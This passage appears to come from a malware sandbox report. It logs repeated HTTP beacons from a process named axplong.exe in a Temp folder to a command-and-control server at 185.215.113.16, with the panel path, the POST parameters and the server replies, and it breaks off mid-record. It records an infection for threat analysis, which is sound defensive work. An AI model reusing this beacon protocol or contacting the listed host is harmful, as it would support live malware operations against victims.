                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:28.002094030 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:28.234582901 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:28 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          23 | 192.168.2.4 | 55673 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:28.555716038 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:29.270960093 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:29 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:29.273848057 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:29.507033110 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:29 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          24 | 192.168.2.4 | 55674 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:29.618700027 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:30.327445984 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:30 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:30.328258038 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:30.577008963 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:30 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          25 | 192.168.2.4 | 55675 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:30.868520021 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:31.605555058 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:31 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:31.606581926 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:31.838464975 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:31 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          26 | 192.168.2.4 | 55676 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:31.946082115 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:32.642419100 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:32 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:32.643196106 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:32.872140884 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:32 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          27 | 192.168.2.4 | 55677 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:33.004610062 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:33.706315041 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:33 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:33.707165956 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:33.934096098 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:33 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          28 | 192.168.2.4 | 55678 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:34.055437088 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:34.762482882 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:34 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:34.763396025 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:34.994739056 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:34 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          29 | 192.168.2.4 | 55679 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:35.102489948 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:35.797306061 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:35 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:35.804246902 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:36.027578115 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:35 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          30 | 192.168.2.4 | 55680 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:36.150890112 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:36.850660086 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:36 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:36.866652012 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:37.101211071 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:36 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          31 | 192.168.2.4 | 55681 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:37.211791039 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:37.948664904 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:37 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:37.951479912 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:38.180243969 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:38 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          32 | 192.168.2.4 | 55682 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:38.290827990 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:39.010049105 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:38 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:39.010701895 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:39.243298054 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:39 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          33 | 192.168.2.4 | 55683 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:39.352461100 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:40.051671028 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:39 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:40.052391052 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:40.277755022 CEST | 196 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:40 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          34 | 192.168.2.4 | 55684 | 185.215.113.16 | 80 | 2140 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Sep 26, 2024 17:06:40.399821997 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:41.091953993 CEST | 219 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:40 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:41.092789888 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
